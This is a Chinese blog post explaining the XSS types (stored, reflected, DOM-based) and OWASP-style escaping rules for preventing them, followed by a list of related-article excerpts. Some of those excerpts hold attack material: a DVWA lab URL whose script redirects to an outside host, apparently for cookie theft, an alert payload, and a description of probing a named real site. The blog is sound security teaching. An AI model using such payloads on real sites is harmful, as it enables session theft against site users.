关于XSS的一点理解

最新推荐文章于 2023-09-21 09:36:30 发布
最新推荐文章于 2023-09-21 09:36:30 发布
阅读量347 收藏
点赞数
文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ryanqy/article/details/91409384
版权

什么是XSS攻击

XSS,缩写自Cross-Site Scripting,即跨站脚本攻击,是一种注入型攻击方法,也就是攻击者把恶意脚本注入到良性和可信任的网站中。XSS攻击者通常会利用Web应用(通常在浏览器端脚本的form中)发送恶意代码给其他的Web应用用户。XSS的攻击原理就是攻击者使用XSS发送一些恶意的脚本代码给一些未防备的用户,这些用户的浏览器没办法分辨出这些脚本是否应该被信任,并且会完整的执行这些脚本,因为这些用户的浏览器以为这些脚本是可信任的,这些恶意脚本可以访问用户的cookies信息、session信息或者是其他的敏感信息。这些恶意脚本甚至可以重写HTML页面内容。

XSS的类型

早些时候,只定义了两种XSS类型:存储型XSS和反射型XSS。在2005年的时候,Amit Klein定义了第三种类型:基于DOM的XSS。

存储型XSS

存储型XSS也叫做持久型或者Type I。存储型XSS通常发生在用户的输入存储在目标服务器端,例如数据库、访问日志、注释字段等等。受害者可以从Web应用中读取这部分存储在目标服务器的恶意输入,并在浏览器上进行渲染。随着HTML5和其他一些浏览器的技术出现,这些恶意的代码可以长期存储在受害者的浏览器中,例如HTML5数据库中,并且可以做到再也不发送任何信息到服务端。

反射型XSS

反射型XSS也叫做非持久型或者Type II。反射型XSS通常发生在用户输入会被Web应用在错误信息、搜索结果或其他包含一部分或者全部用户输入信息的请求立即返回的情况,受害者浏览器进行渲染后不会存储这些信息。在某些情况下,用户输入甚至不会离开浏览器的范围(例如如下将要介绍的基于DOM的XSS)。也就是说,反射型XSS需要攻击者事先制作好攻击链接,欺骗用户自己去点击链接才能出发XSS代码(服务器中并没有这样的页面和内容)。

基于DOM的XSS

基于DOM的XSS也叫做Type-0,是由Amit Klein定义。DOM是一种与平台、编程语言无关的接口,它允许程序或者脚本动态的访问和更新文档的内容、结构和样式,处理后的结果能够成为显示页面的一部分。举个例子来说,如果通过Ajax添加、修改HTML中某一元素的内容,将其替换为来自于Ajax返回的数据的话,那么很明显,每次网页源码都是一样的,但是根据Ajax返回的数据不同,展示出来的网页内容也不一样。那如果Ajax返回的数据使用户可控并且在输出时没有做过滤呢?

基于DOM的XSS和反射型XSS以及存储型XSS最大的区别是:存储型XSS和反射型XSS都是在服务端注入,而基于DOM的XSS是在浏览器端注入。

XSS的防御方式

这里我只总结一些使用escaping/encoding的方式,这是因为虽然XSS的攻击方式众多,但是一些简单的escaping/encoding办法却可以起到很好的效果。
通常来说,反射型XSS和存储型XSS可以在服务端通过一些适当的转义和校验就可以解决。

XSS防御模型

这里我们把HTML页面当做一个有很多插槽的模板,开发者可以在这些插槽中插入不可信的数据。当你把不可信的数据插入到这些插槽中时,你就要确定这些数据是否会破坏这个模板。

反射型XSS及存储型XSS防御规则

下面这些规则意图在你的应用中防止所有的XSS。你并不需要应用所有的规则,很多人可能会发现只是应用规则1和规则2就足以应付他们的需求。

  • 规则0:除了在允许的位置,绝不插入任何不可信数据
    不要将任何不受信的数据放入到HTML文档中,除非它位于规则1到规则5中定义的某个插槽中。HTML中有很多奇怪的上下文,这会导致转义规则十分的复杂,我们也没有任何的理由去这样做。
    例如:插入属性的名字
<div ...NEVER PUT UNTRUSTED DATA HERE...=test />

插入一个HTML的注释

<!--...NEVER PUT UNTRUSTED DATA HERE...-->
  • 规则1:在HTML Element Content中插入不可信数据前,必须要对HTML进行转义
    例如:对于HTML的body元素
<body>
...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...
</body>
  • 规则2:在插入不可信数据到HTML属性中时必须要进行转义
    例如:不可以直接插入不可信数据到href属性中
<a htrf=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...>content
  • 规则3:插入不可信数据到JavaScript中必须要进行转义
    例如:不要进行如下所示的赋值之前要进行转义
<script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
  • 规则4:在把不可信数据插入到HTML样式属性值中之前需要进行CSS转义和Strictly
  • 规则5:在把不可信数据插入到HTML URL的参数值中之前要进行URL转义
    例如:如下所示的插入就可能导致XSS攻击
<a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

基于DOM的XSS的防御规则

当浏览器渲染HTML和CSS、JavaScript等等内容的时候会针对不同内容的文件定义不同的渲染上下文,并且为不同的上下文定义不同的规则。我们在这里把HTML、HTML属性、URL以及CSS的上下文设定为子上下文,因为这些上下文可以被JavaScript执行的上下文所访问和设置。

  • 规则1:在JavaScript执行上下文中插入不可信数据到HTML子上下文之前进行HTML转义然后再进行JavaScript转义
  • 规则2:在JavaScript执行上下文中插入不可信数据到HTML属性子上下文之前进行JavaScript转义
  • 规则3:在JavaScript执行上下文中插入不可信数据到事件处理器中和JavaScript代码子上下文中需要小心
  • 规则4:在JavaScript执行上下文中插入不可信数据到CSS属性子上下文之前需要进行JavaScript转义
  • 规则5:在JavaScript执行上下文中插入不可信数据到URL属性中需要先执行URL转义然后再执行JavaScript转义
  • 规则6:使用安全的JavaScript函数和属性操纵DOM

参考文档
Cross Site Scripting Prevention Cheat Sheet
DOM based XSS Prevention Cheat Sheet

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
跨站脚本攻击(XSS)进阶
悦分享
07-08 311
跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次把XSS列在榜首。跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是 CS S,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。
Springboot 阻止XSS攻击
web13985085406的博客
08-02 817
写此文章的目的是为了记录一下在工作中解决的XSS漏洞问题。XSS漏洞是生产上比较常见的问题。虽然是比较常见并且是基本的安全问题,但是我们没有做??,也怪我没有安全意识。于是终于有一天被制裁了。所以这次就补上了,记录一下。就是注意要分情况处理。拦截器处理一部分,并注意拦截器的注册方式Jackson的方式处理另一部分,也是注意配置方式让我们共同进步。...
XSS的简单了解
j1044957016的博客
05-30 1078
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、XSS的基本了解二、XSS的漏洞危害三、XSS易出现场景四、XSS漏洞分类1.反射型XSS总结 前言 写这玩意儿感觉回到了大学写课设作业 一、XSS的基本了解 XSS 被称为跨站脚本攻击由于和CSS 重名,所以改为XSSXSS主要使用javascript,javascript 可以非常灵活的操作html、css和浏览器。 XSS 就是将恶意代码注入到网页中,以达到攻击的效果。 当用户访问被XSS 注入的网页,XSS.
XSS理解(1)
陈开心的博客
09-11 335
XSS的攻击方式: 反射型:发出请求时,xss代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,xss代码随响应内容一起传回给浏览器,最后浏览器解析执行xss代码。这个过程就像一次反射,故叫反射型xss。 存储型:存储型xss和反射型xss的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交xss代码 盗用cookie获取一些敏感信...
XSS简单理解--安全(三)
qq_43371350的博客
03-26 520
XSS,跨站脚本攻击 通常指黑客通过HTML注入(控制输入变量)篡改网页,插入恶意脚本 防御手段:在输入时过滤某些语句(黑名单/白名单技术) 构造的URL如下: http://192.168.122.130/DVWA-1.9/vulnerabilities/xss_r/?name=<script>document.location = 'http://172.16.20.116:808...
关于XSS(二)
SalmonellaVaccine的专栏
10-29 928
http://tmxk.org/thread-217-1-1.html 前面是xss基础。现在看看xss实战: 第一个:拿www.b2b.cn做测试。 用标注字符测试,搜索"/即可,看网页里有无所搜索字的显示,即回显。 有则再看网页源码,这些会显示以实体字符还是以原样存在的。实体字符就是&#十六进制形式的。 如果不是实体就可以XSS了。 搜“/http://search
xss的介绍以及概述
ranuy阮的博客
07-04 1226
**何为XSS ** 首先,xss(Cross Site Scripting)是为了不和css(Cascading Style Sheets)缩写混淆而缩写为xss,直接翻译过来就是跨站脚本。 跨站脚本攻击是常见的前端web攻击。攻击者通过在页面中插入精心构造的恶意JavaScript脚本。引诱用户去点击构造的js恶意代码。当受害者去点击这些恶意代码后,游览器会去解析执行恶意的js代码。从而导致窃取用户身份/钓鱼/传播恶意代码等危害。很常见的一个xss攻击就是弹窗。 XSS的分类 反射型 储存型 DOM型
XSS浅析
Mr_Rongyao的博客
09-01 169
反射型XSS是非持久性、参数型的跨站脚本。反射型XSS的JS代码再Web应用的参数(变量)中,如搜索框的反射型XSS。在搜索框中,提交PoC[scriptalert(/xss/)/script],点击搜索,即可出发反射型XSS。**注:**所谓非持久性是指该操作不会进入数据库,只能在页面上展示。下面也a标签举例
浅谈xss
最新发布
Nailaoyyds的博客
09-21 385
WAF最大的问题,在于不知道输出的位置,导致攻击者根据具体环境以及具体输出的标签类型便可以绕过。
RCE姿势学习:从存储型XSS漏洞到RCE利用
2301_79205724的博客
08-31 480
很多同学在挖掘漏洞的中期都会有一个疑问:为什么别人挖到的都是高危或者严重漏洞,而我总是只能挖到一些信息泄露或者常规的XSS呢?来询问这个问题的人其实非常非常多,但其实归根结底都是一个原因,漏洞没有深入利用。所以今天咱们就来学习一下大佬们是怎么利用一个XSS来RCE的思路吧。后续利用RCE的内容比较难,需要有一定编程能力才能比较好理解,所以前面说到漏洞没有深入利用的问题,其原因百分之八十是源于你基础不够扎实,你的“地基”决定了你的高度,所以呀学习千万不能图快学成个脚本小子哦。
那些年我们一起学XSS1
08-04
在某些情况下,换行符(`\n`或`\r\n`)可能会被用于分隔字符串,攻击者可以利用这一点在特定位置插入换行符,改变代码结构,实现注入。 ### 7. 宽字节、反斜线与换行符一起复仇记 结合使用以上各种技术,攻击者可以...
XSS跨站脚本攻击
SYJ_361的博客
12-23 4006
本文介绍了XXS跨站脚本攻击的几种方法。其中包括对反射型XSS、存储型XSS和DOM型XSS的攻击,以及我们在kali中用到了beef和Setoolkit对目标进行信息获取。
关于XSS跨站
m0_51581045的博客
11-20 3186
关于XSS跨站的一些笔记 一.XSS的原理 1.XSS的本质 XSS的本质是一种前端漏洞,用户的数据被当成前端代码的一部分来执行,从而混淆了原本的语义,产生了新的语义. 比如在这里输入xiaodi,页面回显了xiaodi,如果把这换成js脚本那么就可以实现一些目的。 2.XSS的产生层面 如果网站使用MVC架构,那么XSS就发生在VIEW层,即在应用拼接变量到HTML页面时产生.在有用户提交数据进行输入检查的方法,其实并不是在真正发生攻击的地方防御.比如在线购物平台会将购买人的信息返回到服务器查看,这是如
DVWA XSS #04-Encoding
baynk的博客
11-22 225
0X01 WooYun-2012-16041 GOGOGO,走起来。 有做实体转义,用上关的payload来试。 换行无效,还是被"闭合着,上一关可以换行的原因大概是因为最前面有个//。 而且用的是innerHTML,所以就不能用<script>这种有闭合标签的了,用svg或者img之类的都可以。那另外一个关键的地方在于,<>都被实体转义了,所以这里使用\u003c和...
XSS详细讲解
liuqinhou的博客
06-06 4916
XSS蠕虫主要发生在用户之间存在交互行为的页面中,当Web应用程序对用户输入的数据信息没有做严格的过滤时,通过结合Ajax的异步提交,就可以实现在植入恶意代码的同时,将恶意代码进行对外发送,即实现了代码的感染和传播,也就形成了XSS蠕虫。转义" &quto;即转义掉双引号,'转义掉单引号,(另一个要注意的是实际上html的属性可以不包括引号,因此严格的说我们还需要对空格进行转义,但是这样会导致渲染的时候空格数不对,因此我们不转义空格,然后再写html属性的时候全部带上引号)这样属性就不会被提前关闭了。
xss攻击突破转义_Web常见攻击
weixin_39884872的博客
11-14 261
scrf攻击简介:跨站请求伪造攻击原理:网站B对用户建立信任关系后,用户在信任有效期内访问攻击者建立的网站F,网站F利用这种信任关系,跨站点向B网站发起一些伪造的用户操作,一达到攻击的目的。也可以理解为:攻击者盗用被攻击者的登录信息,以被攻击者身份模拟发送各种请求。攻击过程:1.用户已经登陆了站点A,并在本地记录了cookie2.在用户没有登出站点A的情况下(也就是cookie生效的情况...
XSS跨站点预防规则
Artisan_w
03-05 5853
XSS跨站点预防规则 不要简单地对各种规则中提供的示例字符列表进行编码/转义。仅编码/转义该列表是不够的。阻止列表方法非常脆弱。此处的允许列表规则经过精心设计,即使将来因浏览器更改而引入的漏洞也能提供保护。 规则 0 除了在允许的位置,永远不要插入不受信任的数据 第0条规则是拒绝所有不受信任的数据放入您的 HTML 文档,除非它满足下面所陈述的规则。原因是 HTML 中有太多奇怪的上下文,以至于编码规则列表变得非常复杂。例如 JavaScript 中的 URL的编码很麻烦。最重要的是,永远不要接受来自不受
PHP相关系列 - XSS相关
自娱自乐的代码人
09-12 1859
关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造) 我们常说的网络安全其实应该包括以下三方面的安全: 1、机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马。 2、完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子,当然这是传说,常见的方式是XSS跨站脚本攻击和csrf跨站请求伪造。 3、可用性,比如我们的网络服务是否可用,常用的攻击方式是dos和d
Django防止XSS攻击的几种方式
u011300968的博客
07-19 8159
一、什么是XSS攻击 XSS即跨站脚本攻击,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 二、防止XSS攻击的两种方式 1、对单一变量逐个进行转义过滤。利用{% autoescape off|on %}。 2、利用django的HTML自动转义,无需autoescape 标签,django中的HTML文档会自动转义。< 转化
xss-labs靶场实战:安全防御与攻击技巧
以下是关于XSS-Labs靶场的一些关键知识点: 1. 第一关 这一关的核心是利用Name参数的未过滤性质执行简单的XSS攻击。攻击者利用`<script>alert("XSS")</script>`作为payload,展示了基础的反射型XSS,即直接将用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值